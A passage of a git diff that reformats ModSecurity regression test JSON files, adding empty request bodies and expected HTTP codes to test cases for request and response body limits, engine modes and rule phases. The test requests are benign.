cookie I", + "Cookie2": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie II", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"40\" \\(Variable: TX:anomaly_score\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"40\" \\(Variable: TX:anomaly_score\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,setvar:tx.critical_anomaly_score=5\"", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:2,setvar:tx.anomaly_score=10\"", diff --git a/test/test-cases/regression/config-body_limits.json b/test/test-cases/regression/config-body_limits.json index b4e84517f5..da3e836c9e 100644 --- a/test/test-cases/regression/config-body_limits.json +++ b/test/test-cases/regression/config-body_limits.json @@ -1,106 +1,112 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ +[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ "no need." ] }, - "expected":{ - "http_code":403 + "expected": { + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction ProcessPartial", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction ProcessPartial", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyLimitAction ProcessPartial", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -118,47 +124,47 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":403 + "expected": { + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject - Engine Disabled", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject - Engine Disabled", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -176,47 +182,47 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine Off", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject - Engine Detection Only", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject - Engine Detection Only", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -234,46 +240,46 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction ProcessPartial", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction ProcessPartial", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -291,146 +297,152 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyLimitAction ProcessPartial", "SecRequestBodyLimit 5" ] }, - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject - Engine Disabled", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject - Engine Disabled", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine Off", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject - Engine Detection Only", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject - Engine Detection Only", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - urlencoded, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - urlencoded, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", @@ -438,45 +450,45 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - urlencoded, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - urlencoded, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 60", @@ -484,46 +496,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - json, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - json, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/json" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "{\"param1\":{\"param2\":\"value2\",\"param3\":\"value3\"}}" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", @@ -532,45 +544,45 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - json, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - json, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/json" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "{\"param1\":{\"param2\":\"value2\",\"param3\":\"value3\"}}" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 80", @@ -579,47 +591,47 @@ ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"SecRequestBodyNoFilesLimit - xml, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - xml, limit exceeded", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "application/xml" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "ccceee" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", @@ -628,46 +640,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"SecRequestBodyNoFilesLimit - xml, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - xml, limit not exceeded", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "application/xml" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "ccceee" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 90", @@ -676,27 +688,27 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - multipart, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - multipart, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "multipart/form-data; boundary=0000" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "--0000\n", "Content-Disposition: form-data; name=\"a\"\n", @@ -709,21 +721,21 @@ "--0000--\n" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 80", @@ -731,27 +743,27 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - multipart, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - multipart, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "multipart/form-data; boundary=0000" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "--0000\n", "Content-Disposition: form-data; name=\"a\"\n", @@ -764,20 +776,20 @@ "--0000--\n" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 120", @@ -785,4 +797,3 @@ ] } ] - diff --git a/test/test-cases/regression/config-calling_phases_by_name.json b/test/test-cases/regression/config-calling_phases_by_name.json index 39bd6f46d2..8e82a19172 100644 --- a/test/test-cases/regression/config-calling_phases_by_name.json +++ b/test/test-cases/regression/config-calling_phases_by_name.json @@ -1,79 +1,87 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Config :: Phases by name (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Config :: Phases by name (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)" + "expected": { + "debug_log": "Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:key \"@contains other_value\" \"id:1,phase:request,pass,chain\"", "SecRule MATCHED_VAR \"@contains asdf\" \"\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Config :: Phases by name (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Config :: Phases by name (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)" + "expected": { + "debug_log": "Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:key \"@contains other_value\" \"chain,pass,phase:response,id:28\"", "SecRule MATCHED_VAR \"@contains Aasdf\" \"\"", @@ -83,4 +91,3 @@ ] } ] - diff --git a/test/test-cases/regression/config-include-bad.json b/test/test-cases/regression/config-include-bad.json index 76797552d7..74cd0ee6cc 100644 --- a/test/test-cases/regression/config-include-bad.json +++ b/test/test-cases/regression/config-include-bad.json @@ -1,51 +1,159 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Include - bad rule", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - bad rule", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + 